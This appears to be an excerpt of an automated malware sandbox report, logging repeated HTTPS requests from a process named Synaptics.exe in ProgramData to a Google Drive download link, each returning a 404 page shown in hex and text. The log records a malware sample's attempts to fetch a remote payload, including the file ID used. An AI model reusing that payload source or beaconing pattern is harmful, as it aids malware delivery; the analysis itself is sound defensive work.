                                                                                                                                                                                        2022-05-17 11:31:50 UTC472INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:50 UTC473INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        155192.168.2.349922142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:50 UTC470OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:50 UTC473INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:50 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-eWl3E+ez7O2JtfJjRj89lQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:50 UTC474INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:50 UTC474INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 59 4b 77 44 42 68 34 77 38 35 4a 33 2b 44 6d 61 73 43 64 65 39 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="YKwDBh4w85J3+DmasCde9g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:50 UTC475INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:50 UTC476INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        156192.168.2.349924142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:50 UTC473OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:51 UTC476INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:50 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-lojL4gOzDVOFiuoBa743Dw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:51 UTC477INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6e 6c 56 6f 31 42 36 6d 2f 66 51 53 45 69 65 4a 31 76 52 33 46 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="nlVo1B6m/fQSEieJ1vR3Fg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:51 UTC479INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:51 UTC479INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        157192.168.2.349925142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:51 UTC476OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:51 UTC479INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:51 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-7HsWGaWkgM39FrtGAw+UEg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:51 UTC481INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 48 47 64 69 6c 36 44 56 6a 76 47 50 75 38 4b 4c 78 4a 55 4e 30 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="HGdil6DVjvGPu8KLxJUN0A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:51 UTC482INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:51 UTC482INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        158192.168.2.349926142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:51 UTC479OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:51 UTC482INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:51 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-7HcKiAtCM2oiBXjLF6jdBw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:51 UTC484INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:51 UTC484INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 7a 5a 33 70 62 6c 4d 45 78 64 72 59 44 4e 4b 35 77 79 58 54 51 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="zZ3pblMExdrYDNK5wyXTQQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:51 UTC485INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:51 UTC485INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        159192.168.2.349927142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:51 UTC482OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:51 UTC485INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:51 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-yWs9ze+joafCErv67CoSNw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:51 UTC487INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:51 UTC487INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 44 78 68 33 4c 57 77 76 51 51 6f 4c 50 31 79 78 4b 51 64 4a 67 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Dxh3LWwvQQoLP1yxKQdJgQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
